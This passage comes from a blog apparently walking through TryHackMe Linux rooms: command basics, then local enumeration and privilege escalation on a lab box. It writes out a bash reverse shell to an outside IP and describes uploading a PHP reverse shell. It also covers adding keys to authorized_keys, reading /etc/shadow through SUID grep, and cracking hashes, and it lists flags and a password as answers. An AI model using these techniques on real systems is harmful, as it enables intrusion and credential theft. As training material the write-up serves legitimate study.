    It can be done rather using letter notation or numerical values.



    Let's take a look at the following command:

     

    chmod u=rwx,g=rx,o=rw myfile


    •     u = user is being giver read, write and execute permission
    •     g = group can now read and execute
    •     o = other can read and write



    This long notion can be eliminated by numerical values for permission. There are exactly four of them:



    • 0 stands for "no permission."
    • 1 stands for "execute";
    • 2 stands for "write";
    • 4 stands for "read".


     

     

    Those values can be easily combined by adding them up.

    For example, permission to read, write and execute would be 7 (1 + 2 + 4).

     

    chmod 777 file

     

     

    The following command will grant full file access to everyone on the system. (Those numerical values can be easily calculated using an interactive chmod-calculator).

    chmod command comes in handy with ssh key files (id_rsa). By editing their permissions to 'user read-write only' we can use other people's id_rsa files to connect via ssh.



    chmod 600 id_rsa











    Task 8 echo


    echo is the most fundamental command found in most operating systems. It used to prints text to standard output, for example, terminal. It is mostly used in bash scripts in order to display output directly to user's console.





     

    echo can also be used to interact with other system commands and pass some value to them.








     

    echo also has a small trick which allows to print out any command output to console.



    echo "$( [command] )"

     

    What command would you use to echo the word "Hackerman" ?








    Task 9 xargs


    xargs command builds and executes command lines from standard input. It allows you to run the same command on a large number of files.





     

     

     

    xargs is often used with the find command, in order to easily interact with its input.



    Let's take a look at the given command:



    find /tmp -name test -type f -print | xargs /bin/rm -f


     

    On the left side, we can see a command which should technically display all files under a name 'test'. xargs command on the left allows us to execute rm (remove) on those files and easily delete all of them.
    Same can be done with reading all the files under the name 'test'.

     

     

    1) How would you read all files with extension .bak using xargs?

    Ans :- find / -name *.bak -type f -print | xargs /bin/cat








    Task 10 hexeditor


    Hexeditor is an awesome tool designed to read and modify hex of a file, this comes in handy especially when it comes to troubleshooting magic numbers for files such as JPG, WAV and any other types of files. This tool is also helpful when it comes to CTFs and text is hidden inside a file or when the magic number of a file was altered.

    Another tool that is good for this kind of scenarios is called strings but we won't be talking about it in this part of our course.







     

     

     

    For this task, I will be providing you with resources to help you along your journey around challenges you might be facing in which you need the hexeditor tool.



    A few resources I use for tasks that involve analysing files and fixing the magic 

    number I use the following resources:



    https://en.wikipedia.org/wiki/List_of_file_signatures

    https://gist.github.com/leommoore/f9e57ba2aa4bf197ebc5

    https://www.garykessler.net/library/file_sigs.html











    Task 11 curl 

    The curl command transfers data to or from a network server, using one of the supported protocols (HTTP, HTTPS, FTP, FTPS, SCP, SFTP, TFTP, DICT, TELNET, LDAP or FILE). It is designed to work without any user interaction, so could be ideally used in a shell script.



    curl is a huge tool with a lot of switches and possibilities. Let's take a look at some of the most important ones.



    curl http://www.ismycomputeron.com/






     

    The most basic command. Fetches data from the website using the HTTP protocol, and display it using standard HTML code. This is essentially the same as "viewing the source" of the webpage.



    The following command will limit the connection speed to 1,234 bytes/second:



    curl --limit-rate 1234B http://www.ismycomputeron.com/


    Another example is saving the output to a file using either:



    -o to save the file under a different name
    curl -o loginpage.html https://tryhackme.com/login



    -O to save the file under the same name:


    curl -O https://tryhackme.com/login

    Or, you might be interested in fetching the headers silently?


    curl -I -s https://tryhackme.com

     

     

    1) How would you grab the headers silently of https://tryhackme.com but grepping only the HTTP status code?

    Ans :- 






    Task 12 wget


    The wget command downloads files from HTTP, HTTPS, or FTP connection a network.






     

     

     

    wget http://somewebsite.com/files/images.zip






     

    Adding a -b switch will allow us to run wget in the background and return the terminal to its initial state.



    wget -b http://www.example.org/files/images.zip




    1) What command would you run to get the flag.txt from https://tryhackme.com/ ?

    Ans :- 



    2) What command would you run to download recursively up to level 5 from https://tryhackme.com ?

    Ans :-








    Task 13 tar


    tar is a command that allows creating, maintain, modify, and extracts files that are archived in the tar format.






     

     

    The most common example for tar extraction would be:

    tar -xf archive.tar

     




     

     

    -x tells tar to extract files from an archive.

    -f tells tar that the next argument will be the name of the archive to operate on.
     

     

    1) What is the flag from the tar file?

    Ans :-








    Task 14 gzip


    gzip - a file format and a software application used for file compression and decompression. gzip-compressed files have .gz extension.





     

    A gzip file can be decompressed using a simple gzip -d file.gz command, where -d stands for decompress.


    1) What is the content of gzip.txt?

    Ans :-









    Task 15 7zip


    7-Zip is a free and open-source file archiver, a utility used to place groups of files within compressed containers known as "archives".







    7z is as simple as the gzip or tar and you can use the following command:

    7z x file.zip to extract the file

    This tool comes in handy as it works with a lot more file extensions than other tools. You name the archive extension and 7z should be the tool for you.

     

    1) What is the flag inside the 7zip file?

    Ans :-






    Task 16 binwalk


    binwalk allows users to analyze and extract firmware images and helps in identifying code, files, and other information embedded in those, or inside another file, taking as an example steganography.








    A simple command such as binwalk file allows us to perform a simple file scan and identify code information.

    binwalk -e
    file allows us to extract files from firmware. This method is usually used in CTFs, where some important information can be hidden within the file.

    binwalk -Me file does the same as-e, but recursively.






     

     

    1) What is the content of binwalk.txt?

    Ans :-








    Disclaimer


    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)


      



  • TryHackMe Linux: Local Enumeration

     


     

    Local Enumeration -  Learn to efficiently enumerate a linux machine and identify possible weaknesses


    Have you ever found yourself in a situation where you have no idea about "what to do after getting a reverse shell (access to a machine)"?


    If your answer was "Yes", this room is definitely for you. This rooms aims at providing beginner basis in box enumeration, giving a detailed approach towards it. TryHackMe Linux: Local Enumeration

     

    Here's a list of units that are going to be covered in this room:
     

    • Unit 1 - Stabilizing the shell
    • Exploring a way to transform a reverse shell into a stable bash or ssh shell.
    •  
    • Unit 2 - Basic enumaration
    • Enumerate OS and the most common files to identify possible security flaws.
    •  
    • Unit 3 - /etc
    • Understand the purpose and sensitivity of files under /etc directory.
    •  
    • Unit 4 - Important files
    • Learn to find files, containing potentially valuable information.
    •  
    • Unit 6 - Enumeration scripts
    •  Automate the process by running multiple community-created enumeration scripts.


     

    Browse to the MACHINE_IP:3000 and follow the instructions.
    To continue with the room material, you need to get a reverse shell using a PHP payload and a netcat listener (nc -lvnp 1234).

     
    Start up the machine from TryHackMe and go to the url: Machine_IP:3000.

     

    Download the php payload from here (CLICK HERE) and change the IP and Port number (Your tun0 IP - check your tun0 IP in your terminal - sudo ifconfig) with file name (php-reverse-shell.php to "cmd.php" Method 2 and proceed to go to Machine_IP:3000/cmd.php and upload your reverse shell.


     

    Now, go to this URL http://Machine_IP:3000/cmd.php Then go to your command line and open a netcat listener on the port you set for the php payload.  (reverse shell cheatsheet - CLICK HERE)


    nc -nvlp 1234


    Now upload this bash reverse shell in this box and hit enter : bash -c 'bash -i >& /dev/tcp/10.8.61.234/1234 0>&1'

    Our tun0 IP with Port :- 10.8.61.234/1234




    Task 2 Unit 1 - tty


    As you might have noticed, a netcat reverse shell is pretty useless and can be easily broken by simple mistakes.


    In order to fix this, we need to get a 'normal' shell, aka tty (text terminal).
    Note: Mainly, we want to upgrade to tty because commands like su and sudo require a proper terminal to run.



    One of the simplest methods for that would be to execute /bin/bash. In most cases, it's not that easy to do and it actually requires us to do some additional work.
    Surprisingly enough, we can use python to execute /bin/bash and upgrade to tty:
    python3 -c 'import pty; pty.spawn("/bin/bash")'


    Generally speaking, you want to use an external tool to execute /bin/bash for you. While doing so, it is a good idea to try everything you know, starting from python, finishing with getting a binary on the target system.
     

    List of static binaries you can get on the system: github.com/andrew-d/static-binaries

     

    Try experimenting with the netcat shell you obtained in the previous task and try different versions.
     

     

    Read more about upgrading to TTY: blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys
     

    1) How would you execute /bin/bash with perl?

    HINT :- Research! Maybe GTFOBins will give you an idea

    Ans :- perl -e 'exec "/bin/bash";'



    Task 3 Unit 1 - ssh


    To make things even better, you should always try and get shell access to the box.

    id_rsa file that contains a private key that can be used to connect to a box via ssh. It is usually located in the .ssh folder in the user's home folder. (Full path: /home/user/.ssh/id_rsa)


    Get that file on your system and give it read-only permissions
    (chmod 600 id_rsa) and connect by executing ssh -i id_rsa user@ip).


    In case if the target box does not have a generated id_rsa file (or you simply don't have reading permissions for it), you can still gain stable ssh access. All you need to do is generate your own id_rsa key on your system and include an associated key into authorized_keys file on the target machine. 


    Execute ssh-keygen and you should see id_rsa and id_rsa.pub files appear in your own .ssh folder. Copy the content of the id_rsa.pub file and put it inside the authorized_key file on the target machine (located in .ssh folder). After that, connect to the machine using your id_rsa file.








    1) Where can you usually find the id_rsa file? (User = user)

    Ans :- /home/user/.ssh/id_rsa

     

    2)Is there an id_rsa file on the box? (yay/nay)

    Ans :- nay 




    Task 4 Unit 2 - Basic enumeration


    Once you get on the box, it's crucially important to do the basic enumeration. In some cases, it can save you a lot of time and provide you a shortcut into escalating your privileges to root.

    > First, let's start with the uname command. uname prints information about the system.









    Execute uname -a to print out all information about the system.
    This simple box enumeration allows you to get initial information about the box, such as distro type and version. From this point you can easily look for known exploits and vulnerabilities.

    > Next in our list are auto-generated bash files.
    Bash keeps tracks of our actions by putting plaintext used commands into a history file. (~/.bash_history)

    If you happen to have a reading permission on this file, you can easily enumerate system user's action and retrieve some sensitive infrmation. One of those would be plaintext passwords or privilege escalation methods.

    .bash_profile and .bashrc are files containing shell commands that are run when Bash is invoked. These files can contain some interesting start up setting that can potentially reveal us some infromation. For example a bash alias can be pointed towards an important file or process.


    > Next thing that you want to check is the sudo version.
    Sudo command is one of the most common targets in the privilage escalation. Its version can help you identify known exploits and vulnerabilities. Execute sudo -V to retrieve the version.


    For example, sudo versions < 1.8.28 are vulnerable to CVE-2019-14287, which is a vulnerability that allows to gain root access with 1 simple command.

     

    > Last part of basic enumeration comes down to using our sudo rights.
    Users can be assigned to use sudo via /etc/sudoers file. It's a fully customazible file that can either limit or open access to a wider range of permissions. Run sudo -l   to check if a user on the box is allowed to use sudo with any command on the system.







     

    Most of the commands open us an opportunity to escalate our priviligies via simple tricks described in GTFObins.
    https://gtfobins.github.io/#+sudo


    Note: Output on the picture demonstrates that user may run ALL commands on the system with sudo rights. A given configuration is the easiest way to get root.




     

    1) How would you print machine hardware name only?

    Ans :- uname -m




    2) Where can you find bash history?

    Ans :- ~/.bash_history



    3) What's the flag?

    Ans :- thm{clear_the_history}




    Task 5 Unit 3 - /etc

     
    Etc (etcetera) - unspecified additional items. Generally speaking, /etc folder is a central location for all your configuration files and it can be treated as a metaphorical nerve center of your Linux machine.

    Each of the files located there has its own unique purpose that can be used to retrieve some sensitive information (such as passwords). The first thing you want to check is if you are able to read and write the files in /etc folder. Let's take a look at each file specifically and figure out the way you can use them for your enumeration process.

    > /etc/passwd


    This file stores the most essential information, required during the user login process. (It stores user account information). It's a plain-text file that contains a list of the system's accounts, giving for each account some useful information like user ID, group ID, home directory, shell, and more.

    Read the /etc/passwd file by running cat /etc/passwd and let's take a closer look.









    Each line of this file represents a different account, created in the system. Each field is separated with a colon (:) and carries a separate value.

    goldfish:x:1003:1003:,,,:/home/goldfish:/bin/bash



    1. (goldfish) - Username
    2. (x) - Password. (x character indicates that an encrypted account password is stored in /etc/shadow file and cannot be displayed in the plain text here)
    3. (1003) - User ID (UID): Each non-root user has his own UID (1-99). UID 0 is reserved for root.
    4. (1003) - Group ID (GID): Linux group ID
    5. (,,,) - User ID Info: A field that contains additional info, such as phone number, name, and last name. (,,, in this case means that I did not input any additional info while creating the user)
    6. (/home/goldfish) - Home directory: A path to user's home directory that contains all the files related to them.
    7. (/bin/bash) - Shell or a command: Path of a command or shell that is used by the user. Simple users usually have /bin/bash as their shell, while services run on /usr/sbin/nologin.



    How can this help? Well, if you have at least reading access to this file, you can easily enumerate all existing users, services and other accounts on the system. This can open a lot of vectors for you and lead to the desired root.

    Otherwise, if you have writing access to the /etc/passwd, you can easily get root creating a custom entry with root priveleges.
    (For more info: hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation)
    http://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation



    > /etc/shadow








    The /etc/shadow file stores actual password in an encrypted format (aka hashes) for user’s account with additional properties related to user password. Those encrypted passwords usually have a pretty similar structure, making it easy for us to identify the encoding format and crack the hash to get the password.

    So, as you might have guessed, we can use /etc/shadow to retrieve different user passwords. In most of the situations, it is more than enough to have reading permissions on this file to escalate to root privileges.
     

    cat /etc/shadow


    goldfish:$6$1FiLdnFwTwNWAqYN$WAdBGfhpwSA4y5CHGO0F2eeJpfMJAM

    Wf6MHg7pHGaHKmrkeYdVN7fD.AQ9nptLkN7JYvJyQrfMcfmCHK34S.a/:184

    83:0:99999:7:::

     

    1. (goldfish) - Username
    2. ($6$1FiLdnFwT...) - Password : Encrypted password.
    Basic structure: **$id$salt$hashed**, The $id is the algorithm used On GNU/Linux as follows:
    - $1$ is MD5
    - $2a$ is Blowfish
    - $2y$ is Blowfish
    - $5$ is SHA-256
    - $6$ is SHA-512
    3. (18483) - Last password change: Days since Jan 1, 1970 that password was last changed.
    4. (0) - Minimum: The minimum number of days required between password changes (Zero means that the password can be changed immidiately).
    5. (99999) - Maximum: The maximum number of days the password is valid.
    6. (7) - Warn: The number of days before the user will be warned about changing their password.


     

    What can we get from here? Well, if you have reading permissions for this file, we can crack the encrypted password using one of the cracking methods.

     

    Just like with /etc/passwd, writeable permission can allow us to add a new root user by making a custom entry.



    > /etc/hosts


    /etc/hosts is a simple text file that allows users to assign a hostname to a specific IP address. Generally speaking, a hostname is a name that is assigned to a certain device on a network. It helps to distinguish one device from another. The hostname for a computer on a home network may be anything the user wants, for example, DesktopPC or MyLaptop.

    You can try editing your own /etc/hosts file by adding the MACHINE_IP there like so:



     


    From now on you'll be able to refer to the box as box.thm.

    Why do we need it? In real-world pentesting this file may reveal a local address of devices in the same network. It can help us to enumerate the network further.
     

    1) Can you read /etc/passwd on the box? (yay/nay)

    Ans :- yay




    Task 6 Unit 4 - Find command and interesting files


    Since it's physically impossible to browse the whole filesystem by hand, we'll be using the find command for this purpose.
     



    The most important switches for us in our enumeration process are -type and -name.
     

    The first one allows us to limit the search towards files only -type f and the second one allows us to search for files by extensions using the wildcard (*).





    Basically, what you want to do is to look for interesting log (.log) and configuration files (.conf). In addition to that, the system owner might be keeping backup files (.bak).

    Here's a list of file extensions you'd usually look for: List.
     

     

     


     

     


     


    To find the password I used the command:

    find -type f -name “*.bak” 2>/dev/null     

    OR

    locate .bak
      
       
    To find the flag we can use the same commands only to search for a file called flag.conf as it ask to find a flag and the hint said it could be in a .conf file

    find / -type f -name “flag.conf” 2>/dev/null
       
    OR

    locate flag.conf    

     

     

    1) What's the password you found?

    Ans :-THMSkidyPass


    2) Did you find a flag?

    Ans :- thm{conf_file}




    Task 7 Unit 4 - SUID


    Set User ID (SUID) is a type of permission that allows users to execute a file with the permissions of another user.


    Those files which have SUID permissions run with higher privileges.  Assume we are accessing the target system as a non-root user and we found SUID bit enabled binaries, then those file/program/command can be run with root privileges.

    SUID abuse is a common privilege escalation technique that allows us to gain root access by executing a root-owned binary with SUID enabled.

     

    You can find all SUID file by executing this simple find command:

    find / -perm -u=s -type f 2>/dev/null


    OR


    find / -perm -4000 2>/dev/null

    -u=s searches files that are owned by the root user.
    -type f search for files, not directories


     

    After displaying all SUID files, compare them to a list on GTFObins to see if there's a way to abuse them to get root access.
     

     


     


     

     


    1) Which SUID binary has a way to escalate your privileges on the box?

    Ans :- grep


     

    2) What's the payload you can use to read /etc/shadow with this SUID?

    Ans :-  grep ' ' /etc/shadow





    Task 8 [Bonus] - Port Forwarding


    According to Wikipedia, "Port forwarding is an application of network address translation (NAT) that redirects a communication request from one address and port number combination to another while the packets are traversing a network gateway, such as a router or firewall".

     

    Port forwarding not only allows you to bypass firewalls but also gives you an opportunity to enumerate some local services and processes running on the box.

    The Linux netstat command gives you a bunch of information about your network connections, the ports that are in use, and the processes using them. In order to see all TCP connections, execute netstat -at | less. This will give you a list of running processes that use TCP. From this point, you can easily enumerate running processes and gain some valuable information.

    netstat -tulpn will provide you a much nicer output with the most interesting data.


    https://fumenoid.github.io/posts/port-forwarding



    Read more about port forwarding here: fumenoid.github.io/posts/port-forwarding
    Try using those commands on your system!




    Task 9 Unit 5 - Automating scripts


    Even though I, personally, dislike any automatic enumeration scripts, they are really important to the privilege escalation process as they help you to omit the 'human error' in your enum process.

    > Linpeas

    LinPEAS - Linux local Privilege Escalation Awesome Script (.sh) is a script that searches for possible paths to escalate privileges on Linux/ hosts.

    Linpeas automatically searches for passwords, SUID files and Sudo right abuse to hint you on your way towards root.


     


     

    They are different ways of getting the script on the box, but the most reliable one would be to first download the script on your system and then transfer it on the target.

    wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh

     

    After that, you get a nice output with all the vulnerable parts marked.

    > LinEnum

    The second tool on our list is LinEnum. It performs 'Scripted Local Linux Enumeration & Privilege Escalation Checks' and appears to be a bit easier than linpeas.



    You can get the script by running:


    wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

    Now, as you have two tools on the box, try running both of them and see if either of them shows something interesting!


    Please note: It's always a good idea to run multiple scripts separately and compare their output, as far as each one of them has their own specific scope of 

    exploration. Got it!




    Task 10 Resources and what's next?


    Congratulations! You have successfully gone through Linux local enumeration!
    Now you can understand the main concepts of manual and automatic enumeration which will lead you towards obtaining root!


    We recommend you to continue your education by completing these awesome rooms, covering more in-depth privilege escalation:

    1. https://tryhackme.com/room/sudovulnsbypass
    2. https://tryhackme.com/room/commonlinuxprivesc
    3. https://tryhackme.com/room/linuxprivesc


    After doing so, you can practice your skills by completing these easy challenge machines:

    1. https://tryhackme.com/room/vulnversity
    2. https://tryhackme.com/room/basicpentestingjt
    3. https://tryhackme.com/room/bolt
    4. https://tryhackme.com/room/tartaraus
     

    Bonus :-


    1) Common Linux File Extension :-  https://lauraliparulo.altervista.org/most-common-linux-file-extensions/

    2) Port Forwarding :- https://fumenoid.github.io/posts/port-forwarding

    3) Local File Enumeration Scripts :- https://github.com/Arr0way/linux-local-enumeration-script

    4) For "Clear" Command Fix :- export TERM=xterm




    Disclaimer


    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)



  • WHAT WE DO

    We've been developing corporate tailored services for clients for 30 years.

    CONTACT US

    For enquiries you can contact us in several different ways. Contact details are below.

    Hacking Truth.in

    • Street :Road Street 00
    • Person :Person
    • Phone :+045 123 755 755
    • Country :POLAND
    • Email :contact@heaven.com

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation.